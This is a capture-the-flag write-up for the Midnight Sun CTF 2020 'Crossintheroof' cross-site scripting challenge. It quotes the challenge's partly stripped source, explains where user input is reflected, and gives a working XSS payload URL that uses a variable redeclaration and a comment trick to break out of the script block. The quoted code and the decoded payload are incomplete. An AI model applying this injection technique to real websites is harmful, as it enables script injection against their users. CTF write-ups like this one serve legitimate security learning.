Thanks, Midnight Sun CTF team for this amazing CTF and also for providing
payload for this challenge without that this writeup could not have been
possible.

### Code: http://crossintheroof-01.play.midnightsunctf.se:3000/?source

```php

<script>  
setTimeout(function(){  
try{  
return location = '/?i_said_no_xss_4_u_:)';  
nodice=;  
}catch(err){  
return location = '/?error='+;  
}  
},500);  
</script>  
<script>  
/*  
payload:

*/  
</script>  
<body onload='location="/?no_xss_4_u_:)"'>hi. bye.</body>  
```

# Explanation: #

## Part 1  
In the above code 1st part is PHP code which checks what parameter is passed
and according to that it loads the page.

For Ex. this source code page is accessed by passing the source parameter.

(http://crossintheroof-01.play.midnightsunctf.se:3000/?source)

And it also removes harmful characters.

And when parameter XSS is passed it skips page loading portion, So this part
of code has no use to us because we are going to use the XSS parameter.

## Part 2:  
In the above code, payload XSS is reflected at three places, try block, catch
block and comment section.

Let ?xss=alert(1)

Then Try block will not even execute this code due to return call before it,
and catch block will not be called because no error happens and comment is
just comment, So no XSS.

### Payload:

http://crossintheroof-01.play.midnightsunctf.se:3000/?xss=alert(1);let%20location=1;%0a%3C!--%3Cscript

#### Decoded:  
http://crossintheroof-01.play.midnightsunctf.se:3000/?xss=alert(1);let
location=1;  

Original writeup (https://github.com/hrca-writeups/CTF-
Writeups/blob/master/2020/Midnight%20Sun%20CTF%202020%20Quals/Crossintheroof.md).